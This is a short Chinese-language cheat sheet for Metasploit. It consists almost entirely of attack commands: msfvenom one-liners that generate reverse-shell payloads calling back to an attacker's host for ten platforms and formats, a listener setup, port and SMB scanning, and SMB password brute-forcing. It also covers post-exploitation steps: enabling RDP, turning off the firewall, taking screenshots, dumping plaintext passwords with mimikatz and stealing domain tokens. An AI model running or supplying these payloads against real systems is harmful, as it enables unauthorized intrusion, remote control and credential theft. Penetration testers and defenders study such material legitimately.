Metasploit Framework 利用总结
Jul 13, 2017
msfvenom Payload List
Linux
1 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf |
Windows
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe |
Mac
1 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho |
PHP
1 | msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php |
ASP
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp |
JSP
1 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp |
WAR
1 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war |
Python
1 | msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py |
Bash
1 | msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh |
Perl
1 | msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl |
Handlers
1 | use exploit/multi/handler |
扫描端口
1 | use auxiliary/scanner/portscan/tcp |
Windows Smb模块
扫描smb判断主机
1 | use auxiliary/scanner/smb/smb_version |
爆破smb密码
1 | use auxiliary/scanner/smb/smb_login |
开启3389远程桌面
1 | meterpreter > run post/windows/manage/enable_rdp |
关闭防火墙
1 | shell |
实时截图
1 | screenshot |
meterpreter加载mimikatz抓取明文密码
1 | meterpreter>load mimikatz |
窃取及伪造域账户 token
1 | load incognito |
